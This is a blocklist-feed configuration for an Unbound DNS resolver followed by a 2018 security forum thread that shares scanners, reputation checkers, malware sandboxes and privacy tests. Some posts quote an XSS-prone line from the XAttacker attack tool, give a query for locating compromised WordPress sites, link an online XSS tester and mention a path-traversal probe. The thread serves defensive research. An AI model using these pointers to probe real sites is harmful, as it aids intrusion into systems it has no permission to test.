##FireHol1   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level1.netset   /etc/unbound/firehol1.list   86400   @IP
#FireHol2   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level2.netset   /etc/unbound/firehol2.list   86400   @IP
#FireHol3   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset   /etc/unbound/firehol3.list   86400   @IP
#FireHol4   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level4.netset   /etc/unbound/firehol4.list   86400   @IP
#FireHol-Abusers   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_abusers_30d.netset   /etc/unbound/firehol-abusers.list   86400   @IP

##BaddBoys   black   https://raw.githubusercontent.com/mitchellkrogza/Badd-Boyz-Hosts/master/hosts   /etc/unbound/baddboyz.list   86400   @HOST0
#Krogza-False-Positive   exclude   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-whitelist.txt   /etc/unbound/krogza-fp.list   86400   @DOMAIN
#Krogza-Dead-Domains   exclude   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-dead.txt   /etc/unbound/krogza-dead.list   86400   @DOMAIN
#Krogza-Reactivated   black   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-re-active.txt   /etc/unbound/krogza-reactivate.list   86400   @DOMAIN
#Krogza-Ultimate-IP   black   https://hosts.ubuntu101.co.za/ips.list   /etc/unbound/krogza-ultimate-ip.list   86400   @IP
#Krogza-Ultimate-Domain   black   https://hosts.ubuntu101.co.za/domains.list   /etc/unbound/krogza-ultimate-domain.list   86400   @DOMAIN
##Krogza-Hacked   black   https://raw.githubusercontent.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites/master/hacked-domains.list   /etc/unbound/krogza-hacked.list   86400   @DOMAIN

##Notracking-Hosts   black   https://raw.githubusercontent.com/notracking/hosts-blocklists/master/hostnames.txt   /etc/unbound/notracking-hosts.list   86400   @HOST0
##Notracking-Domains   black   https://raw.githubusercontent.com/notracking/hosts-blocklists/master/domains.txt   /etc/unbound/notracking-domains.list   86400   @DNSMASQ-ADDRESS

##SpamHaus-Top10-TLD   black   https://www.spamhaus.org/statistics/tlds/   /etc/unbound/spamhaus-top10-tld.list   86400   @SPAMHAUS
##SpamHaus-Top10-BotNet   black   https://www.spamhaus.org/statistics/botnet-isp/   /etc/unbound/spamhaus-top10-botnet.list   86400   @SPAMHAUS
##SpamHaus-Top10-ASN   black   https://www.spamhaus.org/statistics/botnet-asn/   /etc/unbound/spamhaus-top10-asn.list   86400   @SPAMHAUS
##SpamHaus-Drop   black   https://www.spamhaus.org/drop/drop.txt   /etc/unbound/spamhaus-drop.list   86400   @IP
##SpamHaus-Edrop   black   https://www.spamhaus.org/drop/edrop.txt   /etc/unbound/spamhaus-edrop.list   86400   @IP
##SpamHaus-DropV6   black   https://www.spamhaus.org/drop/dropv6.txt   /etc/unbound/spamhaus-dropv6.list   86400   @IP
##SpamHaus-ASNDrop   black   https://www.spamhaus.org/drop/asndrop.txt   /etc/unbound/spamhaus-asndrop.list   86400   @ASN

##Steven-Black-Hosts   black   https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-gambling-porn/hosts   /etc/unbound/stevenblack.list   86400   @HOST0

#SquidBlackList-Ads   black   https://www.squidblacklist.org/downloads/dg-ads.acl   /etc/unbound/squidblacklist-ads.list   86400   @DOMAIN
#SquidBlackList-Malicious   black   https://www.squidblacklist.org/downloads/dg-malicious.acl   /etc/unbound/squidblacklist-malicious.list   86400   @DOMAIN

##Suspect-Networks   black   https://suspect-networks.io/downloads/suspect_networks.txt   /etc/unbound/suspect-networks.list   86400   @IP

##Turris-Grey   black   https://project.turris.cz/greylist-data/greylist-latest.csv   /etc/unbound/turris-grey.list   86400   @IP

#Zonefiles-Malware   black   https://zonefiles.io/f/compromised/domains/live/   /etc/unbound/zonefiles-malware.list   86400   @DOMAIN
#Zonefiles-Malware-IP   black   https://zonefiles.io/f/compromised/ip/live/   /etc/unbound/zonefiles-malware-ip.list   86400   @IP

##MalwareDomainList   black   http://www.malwaredomainlist.com/hostslist/hosts.txt   /etc/unbound/malwaredomain.list   86400   @HOST127

##MailwareDomains   black   https://mirror1.malwaredomains.com/files/justdomains   /etc/unbound/malwaredomains.list   86400   @DOMAIN
##Bulk-Registars   black   http://mirror1.malwaredomains.com/files/bulk_registrars.txt   /etc/unbound/bulk-registars.list   86400   @DOMAIN-WILDCARD
##Immortal-Malware   black   http://mirror1.malwaredomains.com/files/immortal_domains.txt   /etc/unbound/immortal-domains.list   86400   @DOMAIN
##Skype-Resolvers   black   http://mirror1.malwaredomains.com/files/Skype-resolvers.txt   /etc/unbound/skype-resolvers.list   86400   @DOMAIN
##Free-WebHosts   black   http://mirror1.malwaredomains.com/files/freewebhosts.txt   /etc/unbound/freewebhosts.list   86400   @DOMAIN
##Spyware   black   http://mirror1.malwaredomains.com/files/spywaredomains.zones   /etc/unbound/spyware.list   86400   @ZONE

##RansomeWareTracker-Domains   black   https://ransomwaretracker.abuse.ch/downloads/RW_DOMBL.txt   /etc/unbound/ransomewaretracker-doms.list   86400   @DOMAIN
##RansomeWareTracker-IPs   black   https://ransomwaretracker.abuse.ch/downloads/RW_IPBL.txt   /etc/unbound/ransomewaretracker-ips.list   86400   @IP
##ZeusTracker-BadDomains   black   https://zeustracker.abuse.ch/blocklist.php?download=baddomains   /etc/unbound/zeus-baddomains.list   86400   @DOMAIN
##ZeusTracker-BadIPs   black   https://zeustracker.abuse.ch/blocklist.php?download=badips   /etc/unbound/zeus-badips.list   86400   @IP
##Feado-Domains   black   https://feodotracker.abuse.ch/blocklist/?download=domainblocklist   /etc/unbound/feado-domains.list   86400   @DOMAIN
##Feado-IPs   black   https://feodotracker.abuse.ch/blocklist/?download=ipblocklist   /etc/unbound/feado-ips.list   86400   @IP
#SSL-BL   black   https://sslbl.abuse.ch/blacklist/sslipblacklist.csv   /etc/unbound/ssl-blacklist.list   86400   @IP

#SA-BlackList   black   http://www.sa-blacklist.stearns.org/sa-blacklist/sa-blacklist.current.domains   /etc/unbound/sa-blacklist.list   86400   @DOMAIN

#OpenPhish   black   https://openphish.com/feed.txt   /etc/unbound/openphish.list   86400   @URL

#PhishTank   black   http://data.phishtank.com/data/online-valid.csv   /etc/unbound/phishtank.list   86400   @URLCSV2

#HPHosts-Ads   black   https://hosts-file.net/ad_servers.txt   /etc/unbound/hphosts-ads.list   86400   @HOST127
#HPHosts-Exploit   black   https://hosts-file.net/exp.txt   /etc/unbound/hphosts-exploit.list   86400   @HOST127
#HPHosts-Misleading   black   http://hosts-file.net/mmt.txt   /etc/unbound/hphosts-misleading.list   86400   @HOST127
#HPHosts-Phising   black   https://hosts-file.net/psh.txt   /etc/unbound/hphosts-phising.list   86400   @HOST127

##Blacklist.DE   black   https://lists.blocklist.de/lists/all.txt   /etc/unbound/blocklist.de.list   86400   @IP
##Blacklist.DE-Strong   black   https://lists.blocklist.de/lists/strongips.txt   /etc/unbound/blocklist.de-strong.list   86400   @IP

#Bogon4   black   https://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt   /etc/unbound/bogon4.list   86400   @IP
#Bogon6   black   https://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt   /etc/unbound/bogon6.list   86400   @IP

Info credits cbuys

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2018, 02:40:30 PM
Re: -https://www.makeuseof.com/tag/followed-click-bait-internet-ads-heres-found/  (Clickbait as clickbait goes)

What do you use as a fact checker for clickbait and media bias?
Example: https://mediabiasfactcheck.com/awareness-act/
Or do you have an extension for that?

Is this a new WOT, webutation outlet?

Always take it with a pince of salt, and make up your own opinion, based of what you know to be facts.
Don't get locked up in your own tunnel-vision.  ;)

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2018, 03:11:32 PM
Part of the Avast Secure Browser:
(https://screencast-o-matic.com/screenshots/u/Lh/1534079363335-25216.png)
(https://screencast-o-matic.com/screenshots/u/Lh/1534079434258-66231.png)
Title: Re: Tests and other Media topics
Post by: polonus on August 14, 2018, 12:34:51 PM
Does the website you are on offer the new TLS-protocol version?
Firefox browsers are now ready for it.
Read: https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/ *
Test website online here: https://www.1and1.com/ssl-checker

* polonus does not particularly recommend the use of CloudFlare. (Be aware of CloudBleed bug).

polonus
Title: Re: Tests and other Media topics
Post by: mchain on August 15, 2018, 06:58:13 AM
Thanks, pol

avast com has two issues of which ssl test will reveal.  Who to notify?
Title: Re: Tests and other Media topics
Post by: polonus on August 17, 2018, 09:34:24 PM
LS,

Bypassing of cookie crunchers in the browser of tracking and monitoring cookies
 
(uBlock Origin, ABP, Disconnect, Ghostery etc.).
How they do it and what they do not fix: https://www.theregister.co.uk/2018/08/17/usenix_cookies/
test data: https://wholeftopenthecookiejar.eu/

How to check cookies random example: http://www.cookiechecker.nl/check-cookies.php?url=ogv-pompetzki.de
and another one: https://webcookies.org/cookies/media.reklamaizer.ru/2468946
also scan: https://privacyscore.org/

polonus (volunteer 3rd part cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 18, 2018, 10:35:19 AM
Canvas Tracking example - give in some text and then click generate (Dutch genereren).
Re: http://ermmedia.nl/canvas/

Protection against canvas tracking: https://thehackernews.com/2017/10/canvas-browser-fingerprint-blocker.html
Trace: -https://www.thewindowsclub.com/trace-offers-tracking-protection-chrome-firefox
MalwareBytes warns against installing Cliqz Internet solution!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 19, 2018, 08:49:11 PM
Searching for outward links on a malware infested (Ramnit A) domain -888088 dot com:
https://seomon.com/domain/88088.com/outbound/
Also: https://moz.com/researchtools/ose/ which ends August 31st, and now https://moz.com/link-explorer ,
where you have to start an account to scan for links:
Same example from the existing links checker:
https://moz.com/researchtools/ose/links?site=88088.com&filter=&source=external&target=page&group=0&page=1&sort=page_authority&anchor_id=&anchor_type=&anchor_text=&from_site=

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2018, 06:43:22 PM
On the subject of DNS interception and manipulation, read:

https://www.theregister.co.uk/2018/08/20/dns_interception/

Some tests to perform:

1. https://cmdns.dev.dns-oarc.net/
2. https://medium.com/@dnsoarc/go-go-check-your-dns-resolver-s-8793e977a84d 
3.  https://www.whatsmydns.net/ 
4. https://openresolver.com/?ip=   
5. https://www.cyberciti.biz/faq/how-to-find-out-what-my-dns-servers-address-is/

Tested with a form and
Quote
Recursive resolver is not detected on X.X.X.X

IP address X.X.X.X is not vulnerable to DNS Amplification attacks.

Also test at:
1.  https://dnssec-debugger.verisignlabs.com/ 
2.  http://www.ipvoid.com/dnssec-lookup/

Read: 3. https://pypi.org/project/dnsknife/ 

In the case of error-scanning:
Please check if you can resolve for instance domain address  'mycomputer.bmw.us' to IP at your Security Center
and at your scanner. I suspect you've got bad DNS server address definition.

Enjoy, my good friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2018, 11:55:10 PM
A situation of a malicious 301 redirect flagged by avast's, re: https://forum.avast.com/index.php?topic=221314.msg1473291#new

You can check the search engine friendliness of redirects here: http://www.webconfs.com/redirect-check.php
In the above example we got these results:
Quote
Either www.club21ids.is is NOT REDIRECTING to any URL or the redirect is NOT SEARCH ENGINE FRIENDLY

or check with Google's Malware Check Tool: https://transparencyreport.google.com/safe-browsing/search?url=%20www.club21ids.is
No insecurity found there for -www.club21ids.is .

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2018, 03:01:05 PM
Added blocklist collection: https://firebog.net/

Also out of the ordinairy blocklist like coinblocker list: https://zerodot1.gitlab.io/CoinBlockerLists/hosts

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2018, 01:15:11 AM
Sometimes you find a block of Base64 Encoded code on a website & you want to see what that code is all about.

Random example: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dHxrbXxeLm5tLn11YEJ7fH0tYltnLV58LV58YltuLX17bnQuaHRtbA%3D%3D~enc  see inside line 32

Here you could have it decoded https://www.base64decode.org/

Our example comes out like this:
Quote
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:ev="http://www.w3.org/2001/xml-events" height="18px" width="18px"><path fill="rgb( 181, 181, 181 )" d="M17.01,7.98299999999995 C17.01,7.98299999999995 17.01,10.005 17.01,10.005 C17.01,10.005 4.87799999999993,10.005 4.87799999999993,10.005 C4.87799999999993,10.005 10.4390000000001,15.566 10.4390000000001,15.566 C10.4390000000001,15.566 9.00299999999993,17.001 9.00299999999993,17.001 C9.00299999999993,17.001 0.99600000000009,8.99400000000003 0.99600000000009,8.99400000000003 C0.99600000000009,8.99400000000003 9.00299999999993,0.98800000000006 9.00299999999993,0.98800000000006 C9.00299999999993,0.98800000000006 10.4390000000001,2.423 10.4390000000001,2.423 C10.4390000000001,2.423 4.87799999999993,7.98299999999995 4.87799999999993,7.98299999999995 C4.87799999999993,7.98299999999995 17.01,7.98299999999995 17.01,7.98299999999995 Z "/></svg>

Good to know if you have some Base64 Decoding and Encoding on your hands, so enjoy my good friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2018, 06:28:36 PM
Important to-day is to know who is tracking you, and who and what to block inside your browser of choice.

Who is tracking you? Find out here: https://whotracks.me/trackers/adriver.html
Related to https://whotracks.me/trackers/aidata.io.html (Mind you several IPs may point to various Autonomous Systems),
Re: https://urlscan.io/domain/ssp.adriver.ru

Re: https://urlquery.net/queue/6866f928-a6f6-4093-aadf-81537d7faeab

https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=eDAxLnxbI3x0fC5bXWAwLmdbZjxwWyM9fFBQTntYVVMmWyM9NDE0Njg3NTA2NzkwMzEyOTU1OCZifF5rPXwjfVtWe30%3D~enc

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2018, 12:24:21 AM
Interesting DNS, SSL/TLS, HTTP and HTML results scanner, example:
https://www.htmlyse.com/htmlyse/rules.quantcount.com

Enjoy my friends, enjoy,

A tester online (do not abuse) - http://iseebug.com/XSSOnline/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2018, 05:40:20 PM
Checking for PHP vulnerabilities, mainly through JavaScript:
What we checked? -> echo"%20<a%20href=$userfile_name><center><b>Sucess%20Upload%20:D%20==>%20$userfile_name</b></center></a>"; from where: hxtps://github.com/Moham3dRiahi/XAttacker/blob/master/XAttacker.php

Analysis at http://www.devbug.co.uk/# produced Line 21: Cross-Site Scripting (XSS) in 'echo' via '$userfile_name'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 16, 2018, 07:29:44 PM
Handy shortcuts for Google Chrome when your cursor has been hacked through fraudulous helpdesk malware.
ALT-TAB to return to the desktop.
ALT-F4 and close Command-W
Esc stops page from loading

Various Google Chrome shortcuts that everyone that only sweaps and clicks should learn by heart:
https://www.computerhope.com/shortcut/chrome.htm

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2018, 02:50:08 PM
1500 websites hackable with the latest WordPress helpdesk fraud attack:
Read: http://labs.sucuri.net/?note=2018-09-18

Example of a query for vulnerable websites:
https://publicwww.com/websites/%22String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+115%2C+111%2C+109%22/

-publicwww.com is a special search engine to search for compromised and/ or compromizable websites, a bit like shodan.
For instance: https://exploits.shodan.io/?q=String.fromCharCode 
Do not go there, when you plan evil, as all you do is being logged.  :D

But for security researchers it is a trove of treasures.  ;)  8)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2018, 03:24:57 PM
Were your mail accounts ever been compromised?
Find out here: https://monitor.firefox.com/scan

For one of my mail accounts this showed up, have long changed passwords in the mean time.
Quote
Example: Malwarebytes
Breach date:November 15, 2014
Compromised accounts:111,623
Compromised data:Dates of birth, Email addresses, IP addresses, Passwords, Usernames, Website activity

Breach data are being provided by: https://www.haveibeenpwned.com/

N.B. If you feel uncomfortable scanning, do not!
I know of several users here on the forums, that won't risk going to haveibeenpwned dot com for instance.


Damian aka polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2018, 10:35:41 PM
Fun Countdown Clock:
https://www.timeanddate.com/counters/newyear.html?p0=534

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2018, 10:56:43 PM
Abuse IP base: https://www.abuseipdb.com/check/5.188.10.76
Bad ip resource to check against: https://www.bytefarm.ch/fail2ban/
Reporting: ip   hostname   tor   country   filter(s)   first reported   last reported   hits   reported by'..'
-5.188.10.76   -5.188.10.76   n    [RU] Russian Federation   sshd   06.06.2018 15:46.03 GMT+0200   13.09.2018 00:08.37 GMT+0200   11   2 host(s)

On belated reporting read: https://abuse.ch/blog/measuring-reaction-time-of-abuse-desks/

and check: https://urlhaus.abuse.ch/browse.php?search=5.188.10.76

Another interesting SSL resource bad certs: https://sslbl.abuse.ch/

Incidents as detected on AS: (random example) https://abuse.shaunc.com/incidents/about/AS16276/

A fail2ban repository from a home address: https://jackfarrand.uk/admin/

Another resource: https://packettotal.com/app/analysis?id=7b770d9a70d575f66e8778b0bb5bdf8e&name=conn

list of bruteforcers: https://home.nuug.no/~peter/bruteforcers.txt

attackers going on: https://attackers.ongoing.today/httpd.txt

another drop of attackers: https://report.cs.rutgers.edu/DROP/attackers

SSH honeypot: https://otx.alienvault.com/pulse/5b8fd4d62f7c866a98fcf80b

spam emitters: https://www.megarbl.net/asncheck/AS16276

POWER DNS queries for non-existent records for existing domains:
https://ns1.fast.qa/?ring=nxdomain-queries

So some lists abuse galore  >:( :D

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2018, 08:47:10 PM
Links to check on spam-IPs:
Found at: https://github.com/stamparm/ipsum  in it's Hall of Shame.
Checked for higher miniFraud Score: https://www.maxmind.com/en/high-risk-ip-sample/171.25.193.25
Forum spam checker: https://www.stopforumspam.com/ipcheck/171.25.193.25
At project honeypot's: https://www.projecthoneypot.org/ip_171.25.193.25
Green Snow list: https://greensnow.co/view/171.25.193.25
WatchGuard RepAuthority's list check: http://www.reputationauthority.org/lookup.php?ip=tor-exit5-readme.dfri.se
In beta: http://beta.brightcloud.com/tools/url-ip-lookup.php

Enjoy, my friends, enjoy,

polonus

P.S. And to say with my good friend, Pondus, it is always a good idea to check IPs against VT:
https://www.virustotal.com/#/ip-address/171.25.193.25

Damian

Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2018, 11:48:01 PM
Known CMS still accept older PHP versions and accordingly vulnerabilities (Drupal, Joomla, Word Press)

Check your code online at the PHPStan Playground...
checked vulnerable code like
Quote
<?
session_start();
include (“../config.php”);
echo $loggedin;

if ($loggedin != “1”){
header(“Location: http://www.google.com”); /* Redirect browser */

}

{
echo “Will this code Get executed?”;
}?>
Where we stumble upon
Quote
unexpected T_STRING, expecting ';'
in line 12 - While testing a web application today, i noticed an unusual 302 HTTP response. Normally a 302 response just has a header and no html code, becuase its meant to be redirecting you to the page cited in the ‘Location’ field of the http header.� The 302 response had the html code which will be presented to the authenticated admin user, but, we didnt have the admin credentials. So, how are we seeing this code. After analyzing the 302 redircect response, we concluded that this was the result of insecure coding. Info credits go to Tesjawi.

So not escaping quotes in the string, of course it's not going to work.
Just add a \ before the " in the <input> tag and you are good to go.
(pol).

Check with PHP malware finder: https://github.com/nbs-system/php-malware-finder/

Enjoy, my good friends, enjoy, and remember PHP often can be inherently insecure.

Encrypted with Yellowpipe's Code Source Encrypter it looks like
Quote
<script>
<!--
document.write(unescape("%3C%3F%0Asession_start%28%29%3B%0Ainclude%20%28%u201C../config.php%u201D%29%3B%0Aecho%20%24loggedin%3B%0A%0Aif%20%28%24loggedin%20%21%3D%20%u201C1%u201D%29%7B%0Aheader%28%u201CLocation%3A%20http%3A//www.google.com%u201D%29%3B%20/*%20Redirect%20browser%20*/%0A%0A%7D%0A%0A%7B%0Aecho%20%u201CWill%20this%20code%20Get%20executed%3F%u201D%3B%0A%7D%3F%3E"));
//-->
</script>
  file: 368a84ccc831bea70c7649b7ce50c0abea9c4557: 412 bytes
     file: c01a81e4621b7a3059b2257cffb9f2c743efd250: 223 bytes

Decoded Files
368a/84ccc831bea70c7649b7ce50c0abea9c4557 from script (412 bytes, 4 hidden) download
coded source: c01a/81e4621b7a3059b2257cffb9f2c743efd250 from script (223 bytes)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2018, 09:34:40 PM
Pages to test your ad-blocker performance: https://pi-hole.net/pages-to-test-ad-blocking-performance/

Read: https://www.raymond.cc/blog/10-ad-blocking-extensions-tested-for-best-performance/

Another test: https://ads-blocker.com/testing/

Pecular subliminal adtest: https://ads-blocker.com/subliminal-advertising/  (not for minors!)
Also see: https://ads-blocker.com/block-referral-spam/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2018, 09:16:28 PM
A not so known browser leak is known as TLS session resumption tracking,
set per default for seven days in stead of the 10 hours several known security researchers propose. 

This tracking is even more of a problem on Android devices ,
 where the browser sessions could stay open much longer.

Both facebook and google to abuse this security protocol for (third party) user tracking and moniotoring.
When the user blocks an ad-tracking way, they find a way around this either this or that way.
It is just a big uneven cat and mouse game.

Read: Lees: https://www.theregister.co.uk/2018/10/19/tls_handshake_privacy/

But there many more ways to track someone through a browser at the cost of privacy.

Test: Notable testing websites:

https://browserleaks.com/

https://whoer.net/

https://ip-check.info/?foundHTTPS=true

https://panopticlick.eff.org/

https://www.doileak.com/'

Also read here: https://www.reddit.com/r/privacy/comments/8221hn/tob_ios_browser_vs_duck_duck_go_ios_browser_vs/
Do not understand why some block reddit now as being a form of  "fake news"?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2018, 12:38:51 AM
Feeds: https://app.cymon.io/feeds  with various malware trackers.

There is loads, like this one: https://urlhaus.abuse.ch/browse/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2018, 12:33:49 PM
Multiple 0-days in Magecart: https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/

An older object injection exploit from 2014 was again being used:
Re: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/

And dangerous PHP function was being abused: http://php.net/manual/en/function.unserialize.php

Check:  https://www.functions-online.com/unserialize.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2018, 03:52:25 PM
Interesting virtual representation on malware analysis:
https://app.any.run/tasks/e15b7ee2-5977-4b8d-b2d7-4a1c74236c52
Also see: https://app.any.run/submissions
and https://report.any.run/44c359341f1956e45ed284befb27115db2c4ef78a123234fcbbd18948d109696/0bc676ad-8d64-466f-b9fd-ad3327963fe6#generalInfo

polonus
Title: Re: Tests and other Media topics
Post by: Pondus on October 29, 2018, 05:30:30 PM
Interesting virtual representation on malware analysis:
https://app.any.run/tasks/e15b7ee2-5977-4b8d-b2d7-4a1c74236c52
Also see: https://app.any.run/submissions
and https://report.any.run/44c359341f1956e45ed284befb27115db2c4ef78a123234fcbbd18948d109696/0bc676ad-8d64-466f-b9fd-ad3327963fe6#generalInfo

polonus
Any.Run - An Interactive Malware Analysis Tool - Is Now Open To The Public
https://www.bleepingcomputer.com/news/security/anyrun-an-interactive-malware-analysis-tool-is-now-open-to-the-public/


Title: Re: Tests and other Media topics
Post by: polonus on November 03, 2018, 01:28:39 PM
Whenever javascript error hunting is your thingie, this YouTube video is just for you: https://www.youtube.com/watch?v=0dgmeTy7X3I
Very illustrative and instructing presentation.

It is interesting how security mechanisms within core-packages still can be circumvented by respresenting code in some other form, for instance via type manipulation. Just think about the sheer number of some 375.000 packages for node.js alone, where such insecurities may lure around the corner!

Also consider how these packages could impact each other. How they could kick up insecurity through the  eco-system. Think of angular.js via %2e/%2e/etc. & alert(1) to circumvent inbuilt safety code.

Is code being skimmed and screened for such errors and insecurity, because we cannot do this automatically? Always a pair of eyes are needed to do this properly.

Fine presentation via the Snyk platform and various vulnerabilities presented for json javascript libraries and ways to compromise ready-made. Read: https://snyk.io/ One could also test code there online.

Example in apis.google.com/js/plusone.js with errors detected in undefined function $ and a Syntax error, see: https://gist.github.com/ashumeow/34c11dcff0f7b2920364 -> Try to open this inside codepad, Undeminished plusone.js has 377 lines of code,  (info source credits go to luntrus).

enjoy, my friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 04, 2018, 12:31:13 AM
As I found the dom-xss online scanner now almost constantly producing a "503 Over Quota",
Hey, Google, give that site another swing?!?

So I looked for an alternative.

Another test site full of tests here: https://find-xss.net/tests/?test_id=1&l=en
Also to test your score of xss vulnerability patterns.
Just for training and protection purposes.

(Do not use these info for evil purposes, as that will put you in trouble with authorities)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 05, 2018, 09:59:27 PM
Online analysis of some malware:
Where we found it: https://urlquery.net/report/7788ed09-00cf-47dc-93f1-f5a63adb6c83
Online analyses:
https://www.hybrid-analysis.com/sample/da117d759fe6aff7b76efa28028e6fcd04c56f80e8b5149fe4d3f5f16b00dc5c?environmentId=100
and: https://www.maltiverse.com/sample/092055023937e87f7926f1905c0ddf23fc85d33e987594e5535b3f995df7931e
and:
https://report.any.run/c1ada39372a4c755098718feaf45d6f7bb389a680e71944352ea2bcb63f146e4/4521ac0e-cc80-434e-9d5f-e90c155785f6
and on IP: https://cymon.io/188.209.52.136
And on security: https://www.htbridge.com/websec/?id=3jqvV8qK
Oversight: https://support.clean-mx.com/clean-mx/viruses.php?country=nl
and here: https://support.clean-mx.com/clean-mx/xmlviruses?response=alive&format=xml&fields=review,url&sa=U&ei=3p2eU8vjH4PwPLbWgJgG&ved=0CBQQFjAA&usg=AFQjCNFW6BPj8vKD_Fo-5fZfTFMi2DNXfw

enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 09, 2018, 11:21:26 PM
Scanner has come to end of lifetime: (was started in 2011)
https://www.troyhunt.com/its-end-of-life-for-asafaweb/

Still there are other valuable scanners online, for instance:
https://codebeautify.org/jsvalidate

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 11, 2018, 11:05:47 PM
You own a website that runs Word Press CMS Content Management Software),
Just check it from time to time,
using the following online scan engines:

https://urlquery.net/
https://sitecheck.sucuri.net
https://hackertarget.com/wordpress-security-scan/
https://retire.insecurity.today/#
https://webhint.io/scanner/
https://aw-snap.info/file-viewer/
https://observatory.mozilla.org/?

Follow up the recommendations found there or inform your web-admin/hoster of security issues detected.

Always use last versions of core-software, theme-software and plug-in software.
Update en Patch continuously , also mind to update PHP.
Retire vulnerable JQuery script(s).

Whenever in doubt post in the "virus and worms" section, and wait for a reaction.

Stay safe and secure,

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 17, 2018, 05:11:25 PM
Relations from searching for a malicious IP address.
We started out here: https://www.maltiverse.com/dashboards/newioc
and found this malicious Toolbar.Conduit executable: https://www.maltiverse.com/sample/b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2
From that hash we stumbled upon: https://www.virustotal.com/pl/file/b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2/analysis/
and also searched at urlquery dot net: https://urlquery.net/report/a2dbd597-f2a8-4536-bffa-4c69afa4c14e
which delivered a bad request alert for us.
This while we also had these resources: https://www.malwareurl.com/ip_listing.php?ASN=AS22822
and  https://www.threatcrowd.org/domain.php?domain=s.delvenetworks.com
or: https://packettotal.com/app/analysis?id=c1a3a5f6393a42e9015251c23cc58c56&name=http
and https://www.threatminer.org/ssl.php?q=66fbc4c6f3788d27a2218571055d8076ef1297e8

IP and hash searches really make sense to find out what malware or suspicious activity lies behind a certain IP address or a specific hash stands for, like:
Quote
SHA256:   b2c78409224552a0522cd218f08b9aea18b47f2accaff3b6068c20519c5d63c2
Nazwa pliku:   uTorrent.exe
Współczynnik wykrycia:   6 / 67
Data analizy:   2018-10-23 06:59:10 UTC ( 3 tygodnie, 4 dni temu )

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2018, 11:08:15 PM
To enable security passed between two parties via JSON Web Tokens.

Editing JSON Web Tokens at jwt.io -Example > eyJhbGciOiJIUzI1NiJ9.e30.FXibJVNHsvJ6Ff-N9XtTTom9cGExRqsldHbrhAOqRUg
HEADER:ALGORITHM & TOKEN TYPE


{
  "alg": "HS256"
}
PAYLOAD:DATA


{}
VERIFY SIGNATURE

HMACSHA256(
  base64UrlEncode(header) + "." +
  base64UrlEncode(payload),
 
your-256-bit-secret

) secret base64 encoded
 Signature Verified
Libraries for Token Signing/VerificationFILTER BY
Warning: Critical vulnerabilities in JSON Web Token libraries with asymmetric keys. Learn more
Then follow the checks..

Securely implement authentication with JWTs using Auth0 on any stack and any device in less than 10 minutes.

TOKENS CREATED
Supported byMissing something?Send a Pull Request-License

Enjoy, my good folks, enjoy,

polonus
Title: Re: Tests and other Media topics
